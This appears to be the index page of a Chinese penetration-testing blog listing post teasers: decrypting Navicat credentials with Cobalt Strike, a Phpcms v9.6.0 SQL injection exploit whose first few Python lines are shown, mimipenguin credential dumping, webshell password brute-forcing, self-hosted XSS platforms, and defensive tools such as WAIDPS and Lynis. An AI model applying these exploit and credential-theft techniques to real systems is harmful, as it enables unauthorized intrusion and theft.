小马博客

一个无聊的人,一个无聊的博客

一. 前言 之前在红队测试内网中遇到了大量主机装了Navicat,因时间有限当时是直接通过Navicat直接导出.ncx放到本地解密,比较的麻烦。为了方便下次使用,故写个小工具配合Cobalt Strike脚本自动读取并解密。 二. Navicat加密规则 ...

发布 2 条评论

我们先看官方博客的两篇文章: 一.Cobalt Strike Team Server Population Study Cobalt Strike Team Server Population Study 由于关乎渗透人员自身的安全,建议大家好好看看,这里我贴出最重要的防护部分: 不要在Cobalt Stri...

发布 2 条评论

注入exp: import requests import sys import urllib url = sys.argv[1] print 'Phpcms v9.6.0 SQLi Exploit Code By Luan' sqli_prefix = '%*27an*d%20' sqli_info = 'e*xp(~(se*lect%*2af*r...

发布 0 条评论

前有Mimikatz,今有mimipenguin,近日国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,可以说弥补了Linux下密码抓取的空缺。 项目地址 https://github.com/huntergregal/mimipenguin 使用实例 需求: ...

发布 0 条评论

看了 接地气写的《让你的一句话爆破速度提升千倍》一文后,觉得思路很666,于是写了个小工具。 可爆ASP/ASPX/PHP/JSP一句话: 实测爆破本地php一句话,近10万字典用时10秒左右。 由于JSP常用一句话特殊性,所以只能判断密码的区间,...

发布 7 条评论

WAIDPS是一个Python编写的无线入侵检测工具,基于Linux平台,完全开源。它可以探测包括WEP/WPA/WPS在内的无线入侵&攻击方式,并可以收集WiFi相关的所有信息。WAIDS适用于渗透测试工作者、无线安全爱好者,当发现攻击时,系统会显示于...

发布 1 条评论

Lynis是针对Unix/Linux的开源安全检查工具,可以发现潜在的系统安全威胁。这个工具覆盖可疑文件监测、漏洞、恶意程序扫描、配置错误等,同时扩展性非常优秀,与OpenVAS / Nessus等工具差别很大。 支持的系统 Lynis没有任何的依赖,可...

发布 0 条评论

PXSS功能预览:http://www.i0day.com//1772.html 在虚拟空间上测试了几天,还是蛮稳定的,之前说好的放出代码在这。 想要多人使用的,自己改改代码就行,功能什么的自己也可以添加。 有什么BUG、建议,欢迎邮件至admin@i0day.com GITHUB项...

发布 19 条评论

一.前言 众所周知BEEF是非常强大的XSS平台,但是它需要安装,感觉比较麻烦,于是乎就仿造BEEF写了个XSS平台(当然功能什么的远不及BEEF)。 平台是以DWR框架+PHP完成的,之前也写了一个多人用的版本,但是感觉不太理想,所以又重新写了这个个...

发布 31 条评论